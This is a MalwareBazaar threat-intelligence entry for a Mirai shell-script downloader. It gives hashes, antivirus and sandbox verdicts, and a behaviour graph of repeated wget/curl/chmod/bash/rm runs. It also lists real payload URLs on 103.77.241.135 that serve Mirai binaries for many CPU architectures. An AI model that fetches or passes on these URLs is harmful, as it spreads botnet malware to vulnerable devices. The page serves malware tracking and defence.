MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 9


Intelligence 9 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4
SHA3-384 hash: a151592ef4205078d26e2d37ead605a03f65ab988f2bc4e72c590aa0706a1b08ef4cd709c514f0b49131b495441d2d77
SHA1 hash: b39b79bd3f607b9edf2d45575ecda37ac7b9f065
MD5 hash: 773672cf2f1ab9a093f1bd1e9e2a3186
humanhash: india-montana-magazine-arkansas
File name:1.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:3'269 bytes
First seen:2025-12-04 20:25:23 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 96:itmqtlMtk6tNUtH8t/QtIKtSCtXWLtuWtJZet1ctQit0yth/H:Z
TLSH T18761D6E511428B346DDB5812A368CB7D3441699FE0EF8F1667FC29BA1C4CEC8AC4D742
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://103.77.241.135/00101010101001/ecco.x86103907e6ca47f6bbe07532ba717b2b96cfd763c8e73c9de04745116ee65e9ca6 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.mips9440dc8f19584608d360d0e34cef50ff1b49b8a928044541aba3e0c9a70390a8 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arcef24158ad8b15653332d0d4da39959653192ada5f87495c213a15d005a84c7e9 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.i468n/an/aelf ua-wget
http://103.77.241.135/00101010101001/ecco.i6869b8020883de80c73cdb74172e7f51d74f3dc120b8160e26d13982e6bab610d48 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.x86_64a7902c832e838c2241aea7865b3d750172aa827818a06312b57e4de0b50d45d1 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.mpsl4da6469d827579d5dcfef6b28149d537b49973dab526572a946bb7b0b6b7a969 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arm6e378cb43fd51ab19e02bef1dfc9d1257feb07b714d288c4acbbe39f698f7ac1 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arm556fec56fef4a92c7c0f98185ea124d9a731e85d6888fc64e05fcf10009e1bc7d Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arm6d17b591889069d9cd3bf82ab91ef30b931a7bf1f56abd7ec5c96f9219864acb0 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.arm768e5952dc56e1479c2b0dc59f094505a066895c683bb9a563e140e00e525623f Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.ppc778e0e157498c9ced95dacf95ebaf2b5eed337e3d7f9bd797fc340091408e41d Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.spcn/an/aelf ua-wget
http://103.77.241.135/00101010101001/ecco.m68k42c43660e6c30a812458adb9e9252fc72daa0fed1d0fff255724d65bd85c37e1 Miraielf mirai ua-wget
http://103.77.241.135/00101010101001/ecco.sh466923770ca13fe676287aabe7167c065eccef8d990903a2512fea3d693455402 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
98
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
File Type:
unix shell
First seen:
2025-12-04T10:38:00Z UTC
Last seen:
2025-12-04T18:36:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.gen HEUR:Trojan-Downloader.Shell.Agent.a HEUR:Trojan-Downloader.Shell.Agent.p
Link:
https://opentip.kaspersky.com/ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/2e58ad29-3573-478e-9386-3ce4c47afaaa
Behavior Graph:
Download SVG
%3 guuid=93796b7c-1600-0000-e9fb-62b6740f0000 pid=3956 /usr/bin/sudo guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963 /tmp/sample.bin guuid=93796b7c-1600-0000-e9fb-62b6740f0000 pid=3956->guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963 execve guuid=1b32af7f-1600-0000-e9fb-62b67d0f0000 pid=3965 /usr/bin/cp guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=1b32af7f-1600-0000-e9fb-62b67d0f0000 pid=3965 execve guuid=80090984-1600-0000-e9fb-62b6890f0000 pid=3977 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=80090984-1600-0000-e9fb-62b6890f0000 pid=3977 execve guuid=de9ea09e-1600-0000-e9fb-62b6f60f0000 pid=4086 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=de9ea09e-1600-0000-e9fb-62b6f60f0000 pid=4086 execve guuid=fc6563c7-1600-0000-e9fb-62b676100000 pid=4214 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=fc6563c7-1600-0000-e9fb-62b676100000 pid=4214 execve guuid=46ffa8c7-1600-0000-e9fb-62b677100000 pid=4215 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=46ffa8c7-1600-0000-e9fb-62b677100000 pid=4215 clone guuid=7f98cfc7-1600-0000-e9fb-62b67b100000 pid=4219 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=7f98cfc7-1600-0000-e9fb-62b67b100000 pid=4219 execve guuid=6ac016c8-1600-0000-e9fb-62b67c100000 pid=4220 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=6ac016c8-1600-0000-e9fb-62b67c100000 pid=4220 execve guuid=68bb72e2-1600-0000-e9fb-62b6e6100000 pid=4326 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=68bb72e2-1600-0000-e9fb-62b6e6100000 pid=4326 execve guuid=fc3c9fff-1600-0000-e9fb-62b65f110000 pid=4447 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=fc3c9fff-1600-0000-e9fb-62b65f110000 pid=4447 execve guuid=6b790100-1700-0000-e9fb-62b663110000 pid=4451 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=6b790100-1700-0000-e9fb-62b663110000 pid=4451 clone guuid=24c83300-1700-0000-e9fb-62b664110000 pid=4452 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=24c83300-1700-0000-e9fb-62b664110000 pid=4452 execve guuid=c32bbd00-1700-0000-e9fb-62b666110000 pid=4454 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=c32bbd00-1700-0000-e9fb-62b666110000 pid=4454 execve guuid=6351db1c-1700-0000-e9fb-62b6b3110000 pid=4531 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=6351db1c-1700-0000-e9fb-62b6b3110000 pid=4531 execve guuid=dff17f39-1700-0000-e9fb-62b631120000 pid=4657 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=dff17f39-1700-0000-e9fb-62b631120000 pid=4657 execve guuid=b8f1c139-1700-0000-e9fb-62b632120000 pid=4658 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=b8f1c139-1700-0000-e9fb-62b632120000 pid=4658 clone guuid=e57de139-1700-0000-e9fb-62b635120000 pid=4661 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=e57de139-1700-0000-e9fb-62b635120000 pid=4661 execve guuid=b0b82f3a-1700-0000-e9fb-62b637120000 pid=4663 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=b0b82f3a-1700-0000-e9fb-62b637120000 pid=4663 execve guuid=41599053-1700-0000-e9fb-62b6a6120000 pid=4774 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=41599053-1700-0000-e9fb-62b6a6120000 pid=4774 execve guuid=264fb76d-1700-0000-e9fb-62b605130000 pid=4869 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=264fb76d-1700-0000-e9fb-62b605130000 pid=4869 execve guuid=1c79fc6d-1700-0000-e9fb-62b607130000 pid=4871 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=1c79fc6d-1700-0000-e9fb-62b607130000 pid=4871 clone guuid=b7301f6e-1700-0000-e9fb-62b608130000 pid=4872 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=b7301f6e-1700-0000-e9fb-62b608130000 pid=4872 execve guuid=b696766e-1700-0000-e9fb-62b60b130000 pid=4875 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=b696766e-1700-0000-e9fb-62b60b130000 pid=4875 execve guuid=ebc7738a-1700-0000-e9fb-62b670130000 pid=4976 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=ebc7738a-1700-0000-e9fb-62b670130000 pid=4976 execve guuid=e74909a5-1700-0000-e9fb-62b6d9130000 pid=5081 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=e74909a5-1700-0000-e9fb-62b6d9130000 pid=5081 execve guuid=f5f049a5-1700-0000-e9fb-62b6dd130000 pid=5085 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=f5f049a5-1700-0000-e9fb-62b6dd130000 pid=5085 clone guuid=039c6aa5-1700-0000-e9fb-62b6de130000 pid=5086 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=039c6aa5-1700-0000-e9fb-62b6de130000 pid=5086 execve guuid=2507b4a5-1700-0000-e9fb-62b6e2130000 pid=5090 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=2507b4a5-1700-0000-e9fb-62b6e2130000 pid=5090 execve guuid=26c77fbf-1700-0000-e9fb-62b620140000 pid=5152 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=26c77fbf-1700-0000-e9fb-62b620140000 pid=5152 execve guuid=ef37bfda-1700-0000-e9fb-62b63d140000 pid=5181 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=ef37bfda-1700-0000-e9fb-62b63d140000 pid=5181 execve guuid=4ce730db-1700-0000-e9fb-62b640140000 pid=5184 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=4ce730db-1700-0000-e9fb-62b640140000 pid=5184 clone guuid=e81164db-1700-0000-e9fb-62b641140000 pid=5185 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=e81164db-1700-0000-e9fb-62b641140000 pid=5185 execve guuid=261dc5db-1700-0000-e9fb-62b644140000 pid=5188 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=261dc5db-1700-0000-e9fb-62b644140000 pid=5188 execve guuid=2650b5f5-1700-0000-e9fb-62b67c140000 pid=5244 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=2650b5f5-1700-0000-e9fb-62b67c140000 pid=5244 execve guuid=19d5c911-1800-0000-e9fb-62b688140000 pid=5256 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=19d5c911-1800-0000-e9fb-62b688140000 pid=5256 execve guuid=88844512-1800-0000-e9fb-62b689140000 pid=5257 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=88844512-1800-0000-e9fb-62b689140000 pid=5257 clone guuid=b2ab7712-1800-0000-e9fb-62b68a140000 pid=5258 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=b2ab7712-1800-0000-e9fb-62b68a140000 pid=5258 execve guuid=5ac4d912-1800-0000-e9fb-62b68b140000 pid=5259 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=5ac4d912-1800-0000-e9fb-62b68b140000 pid=5259 execve guuid=6775b82e-1800-0000-e9fb-62b68c140000 pid=5260 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=6775b82e-1800-0000-e9fb-62b68c140000 pid=5260 execve guuid=9dc9d04b-1800-0000-e9fb-62b68d140000 pid=5261 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=9dc9d04b-1800-0000-e9fb-62b68d140000 pid=5261 execve guuid=011f214c-1800-0000-e9fb-62b68e140000 pid=5262 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=011f214c-1800-0000-e9fb-62b68e140000 pid=5262 clone guuid=13864a4c-1800-0000-e9fb-62b68f140000 pid=5263 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=13864a4c-1800-0000-e9fb-62b68f140000 pid=5263 execve guuid=3ec7a14c-1800-0000-e9fb-62b690140000 pid=5264 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=3ec7a14c-1800-0000-e9fb-62b690140000 pid=5264 execve guuid=e0ad3366-1800-0000-e9fb-62b691140000 pid=5265 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=e0ad3366-1800-0000-e9fb-62b691140000 pid=5265 execve guuid=e55e4581-1800-0000-e9fb-62b692140000 pid=5266 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=e55e4581-1800-0000-e9fb-62b692140000 pid=5266 execve guuid=f99c9e81-1800-0000-e9fb-62b693140000 pid=5267 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=f99c9e81-1800-0000-e9fb-62b693140000 pid=5267 clone guuid=19a7cf81-1800-0000-e9fb-62b694140000 pid=5268 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=19a7cf81-1800-0000-e9fb-62b694140000 pid=5268 execve guuid=f50a2a82-1800-0000-e9fb-62b695140000 pid=5269 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=f50a2a82-1800-0000-e9fb-62b695140000 pid=5269 execve guuid=1bcaf29c-1800-0000-e9fb-62b696140000 pid=5270 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=1bcaf29c-1800-0000-e9fb-62b696140000 pid=5270 execve guuid=5e4243b8-1800-0000-e9fb-62b697140000 pid=5271 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=5e4243b8-1800-0000-e9fb-62b697140000 pid=5271 execve guuid=b0a891b8-1800-0000-e9fb-62b698140000 pid=5272 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=b0a891b8-1800-0000-e9fb-62b698140000 pid=5272 clone guuid=515ec1b8-1800-0000-e9fb-62b699140000 pid=5273 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=515ec1b8-1800-0000-e9fb-62b699140000 pid=5273 execve guuid=1fea29b9-1800-0000-e9fb-62b69a140000 pid=5274 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=1fea29b9-1800-0000-e9fb-62b69a140000 pid=5274 execve guuid=07c77cd6-1800-0000-e9fb-62b6a2140000 pid=5282 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=07c77cd6-1800-0000-e9fb-62b6a2140000 pid=5282 execve guuid=aedc19f3-1800-0000-e9fb-62b6a3140000 pid=5283 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=aedc19f3-1800-0000-e9fb-62b6a3140000 pid=5283 execve guuid=2b9775f3-1800-0000-e9fb-62b6a4140000 pid=5284 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=2b9775f3-1800-0000-e9fb-62b6a4140000 pid=5284 clone guuid=493aa8f3-1800-0000-e9fb-62b6a5140000 pid=5285 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=493aa8f3-1800-0000-e9fb-62b6a5140000 pid=5285 execve guuid=ed6308f4-1800-0000-e9fb-62b6a6140000 pid=5286 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=ed6308f4-1800-0000-e9fb-62b6a6140000 pid=5286 execve guuid=2399a20e-1900-0000-e9fb-62b6a7140000 pid=5287 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=2399a20e-1900-0000-e9fb-62b6a7140000 pid=5287 execve guuid=cbda2241-1900-0000-e9fb-62b6a8140000 pid=5288 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=cbda2241-1900-0000-e9fb-62b6a8140000 pid=5288 execve guuid=e1e9b441-1900-0000-e9fb-62b6a9140000 pid=5289 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=e1e9b441-1900-0000-e9fb-62b6a9140000 pid=5289 clone guuid=7e522842-1900-0000-e9fb-62b6aa140000 pid=5290 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=7e522842-1900-0000-e9fb-62b6aa140000 pid=5290 execve guuid=52bea742-1900-0000-e9fb-62b6ab140000 pid=5291 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=52bea742-1900-0000-e9fb-62b6ab140000 pid=5291 execve guuid=bc558261-1900-0000-e9fb-62b6ac140000 pid=5292 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=bc558261-1900-0000-e9fb-62b6ac140000 pid=5292 execve guuid=a0d3af82-1900-0000-e9fb-62b6ad140000 pid=5293 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=a0d3af82-1900-0000-e9fb-62b6ad140000 pid=5293 execve guuid=8d1c6783-1900-0000-e9fb-62b6ae140000 pid=5294 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=8d1c6783-1900-0000-e9fb-62b6ae140000 pid=5294 clone guuid=c0bfcb83-1900-0000-e9fb-62b6af140000 pid=5295 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=c0bfcb83-1900-0000-e9fb-62b6af140000 pid=5295 execve guuid=e7fa8084-1900-0000-e9fb-62b6b0140000 pid=5296 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=e7fa8084-1900-0000-e9fb-62b6b0140000 pid=5296 execve guuid=6de391a1-1900-0000-e9fb-62b6b1140000 pid=5297 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=6de391a1-1900-0000-e9fb-62b6b1140000 pid=5297 execve guuid=1fc7dec0-1900-0000-e9fb-62b6b2140000 pid=5298 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=1fc7dec0-1900-0000-e9fb-62b6b2140000 pid=5298 execve guuid=5c3151c1-1900-0000-e9fb-62b6b3140000 pid=5299 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=5c3151c1-1900-0000-e9fb-62b6b3140000 pid=5299 clone guuid=cfbe83c1-1900-0000-e9fb-62b6b4140000 pid=5300 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=cfbe83c1-1900-0000-e9fb-62b6b4140000 pid=5300 execve guuid=459ed1c1-1900-0000-e9fb-62b6b5140000 pid=5301 /usr/bin/wget net send-data guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=459ed1c1-1900-0000-e9fb-62b6b5140000 pid=5301 execve guuid=cab6ecdb-1900-0000-e9fb-62b6bc140000 pid=5308 /usr/bin/curl net send-data write-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=cab6ecdb-1900-0000-e9fb-62b6bc140000 pid=5308 execve guuid=a2fd2cf7-1900-0000-e9fb-62b6c4140000 pid=5316 /usr/bin/chmod guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=a2fd2cf7-1900-0000-e9fb-62b6c4140000 pid=5316 execve guuid=415094f7-1900-0000-e9fb-62b6c5140000 pid=5317 /usr/bin/bash guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=415094f7-1900-0000-e9fb-62b6c5140000 pid=5317 clone guuid=74cfbdf7-1900-0000-e9fb-62b6c6140000 pid=5318 /usr/bin/rm delete-file guuid=d944177f-1600-0000-e9fb-62b67b0f0000 pid=3963->guuid=74cfbdf7-1900-0000-e9fb-62b6c6140000 pid=5318 execve 017ae759-64ed-575c-af4d-3774b3807a6e 103.77.241.135:80 guuid=80090984-1600-0000-e9fb-62b6890f0000 pid=3977->017ae759-64ed-575c-af4d-3774b3807a6e send: 152B guuid=de9ea09e-1600-0000-e9fb-62b6f60f0000 pid=4086->017ae759-64ed-575c-af4d-3774b3807a6e send: 101B guuid=6ac016c8-1600-0000-e9fb-62b67c100000 pid=4220->017ae759-64ed-575c-af4d-3774b3807a6e send: 153B guuid=68bb72e2-1600-0000-e9fb-62b6e6100000 pid=4326->017ae759-64ed-575c-af4d-3774b3807a6e send: 102B guuid=c32bbd00-1700-0000-e9fb-62b666110000 pid=4454->017ae759-64ed-575c-af4d-3774b3807a6e send: 152B guuid=6351db1c-1700-0000-e9fb-62b6b3110000 pid=4531->017ae759-64ed-575c-af4d-3774b3807a6e send: 101B guuid=b0b82f3a-1700-0000-e9fb-62b637120000 pid=4663->017ae759-64ed-575c-af4d-3774b3807a6e send: 153B guuid=41599053-1700-0000-e9fb-62b6a6120000 pid=4774->017ae759-64ed-575c-af4d-3774b3807a6e send: 102B guuid=b696766e-1700-0000-e9fb-62b60b130000 pid=4875->017ae759-64ed-575c-af4d-3774b3807a6e send: 153B guuid=ebc7738a-1700-0000-e9fb-62b670130000 pid=4976->017ae759-64ed-575c-af4d-3774b3807a6e send: 102B guuid=2507b4a5-1700-0000-e9fb-62b6e2130000 pid=5090->017ae759-64ed-575c-af4d-3774b3807a6e send: 155B guuid=26c77fbf-1700-0000-e9fb-62b620140000 pid=5152->017ae759-64ed-575c-af4d-3774b3807a6e send: 104B guuid=261dc5db-1700-0000-e9fb-62b644140000 pid=5188->017ae759-64ed-575c-af4d-3774b3807a6e send: 153B guuid=2650b5f5-1700-0000-e9fb-62b67c140000 pid=5244->017ae759-64ed-575c-af4d-3774b3807a6e send: 102B guuid=5ac4d912-1800-0000-e9fb-62b68b140000 pid=5259->017ae759-64ed-575c-af4d-3774b3807a6e send: 152B guuid=6775b82e-1800-0000-e9fb-62b68c140000 pid=5260->017ae759-64ed-575c-af4d-3774b3807a6e send: 101B guuid=3ec7a14c-1800-0000-e9fb-62b690140000 pid=5264->017ae759-64ed-575c-af4d-3774b3807a6e send: 153B guuid=e0ad3366-1800-0000-e9fb-62b691140000 pid=5265->017ae759-64ed-575c-af4d-3774b3807a6e send: 102B guuid=f50a2a82-1800-0000-e9fb-62b695140000 pid=5269->017ae759-64ed-575c-af4d-3774b3807a6e send: 153B guuid=1bcaf29c-1800-0000-e9fb-62b696140000 pid=5270->017ae759-64ed-575c-af4d-3774b3807a6e send: 102B guuid=1fea29b9-1800-0000-e9fb-62b69a140000 pid=5274->017ae759-64ed-575c-af4d-3774b3807a6e send: 153B guuid=07c77cd6-1800-0000-e9fb-62b6a2140000 pid=5282->017ae759-64ed-575c-af4d-3774b3807a6e send: 102B guuid=ed6308f4-1800-0000-e9fb-62b6a6140000 pid=5286->017ae759-64ed-575c-af4d-3774b3807a6e send: 152B guuid=2399a20e-1900-0000-e9fb-62b6a7140000 pid=5287->017ae759-64ed-575c-af4d-3774b3807a6e send: 101B guuid=52bea742-1900-0000-e9fb-62b6ab140000 pid=5291->017ae759-64ed-575c-af4d-3774b3807a6e send: 152B guuid=bc558261-1900-0000-e9fb-62b6ac140000 pid=5292->017ae759-64ed-575c-af4d-3774b3807a6e send: 101B guuid=e7fa8084-1900-0000-e9fb-62b6b0140000 pid=5296->017ae759-64ed-575c-af4d-3774b3807a6e send: 153B guuid=6de391a1-1900-0000-e9fb-62b6b1140000 pid=5297->017ae759-64ed-575c-af4d-3774b3807a6e send: 102B guuid=459ed1c1-1900-0000-e9fb-62b6b5140000 pid=5301->017ae759-64ed-575c-af4d-3774b3807a6e send: 152B guuid=cab6ecdb-1900-0000-e9fb-62b6bc140000 pid=5308->017ae759-64ed-575c-af4d-3774b3807a6e send: 101B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4/
Verdict:
Malicious
Threat:
Family.MIRAI
Link:
https://tip.neiki.dev/file/ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4
Threat name:
Linux.Downloader.Medusa
Create hunting rule
Status:
Malicious
First seen:
2025-12-04 17:10:48 UTC
File Type:
Text (Shell)
AV detection:
22 of 37 (59.46%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=5qk2a63b4ug4qahnphosc6o6lu3bkwdtc3fiwihawszgdi3bvdsa._file
Result
Malware family:
mirai
Create hunting rule
Score:
  10/10
Tags:
family:mirai botnet defense_evasion discovery linux persistence upx
Link:
https://tria.ge/reports/251204-y7gmmadp3t/
Behaviour
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
UPX packed file
Deletes log files
Enumerates running processes
Modifies init.d
Modifies rc script
Writes file to system bin folder
File and Directory Permissions Modification
Deletes Audit logs
Deletes system logs
Executes dropped EXE
Modifies Watchdog functionality
Contacts a large (197486) amount of remote hosts
Creates a large amount of network flows
Mirai
Mirai family
Malware family:
Mirai
Create hunting rule
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/ec15a07b61e5/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Linux_Shellscript_Downloader
Create hunting rule
Author:albertzsigovits
Description:Generic Approach to Shellscript downloaders

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh ec15a07b61e50dc800ed79dd2179de5d3615587316ca8b20e0b4b261a361a8e4

(this sample)

Mirai

elf bed85d14ef5d06d114ccb164443e41d7a22c05341f6bc8e0604193d6fa6396a9

Mirai

elf dbb5caa5f4ed987f3302f25b45eb69d989e35f985683e58086b1b6c524857af5

  
URLhaus
https://urlhaus.abuse.ch/url/3725189/
  
Delivery method
Distributed via web download
  
Dropping
MD5 27e1228377caba82fd156787820b45ba
  
Dropping
SHA256 dbb5caa5f4ed987f3302f25b45eb69d989e35f985683e58086b1b6c524857af5

Comments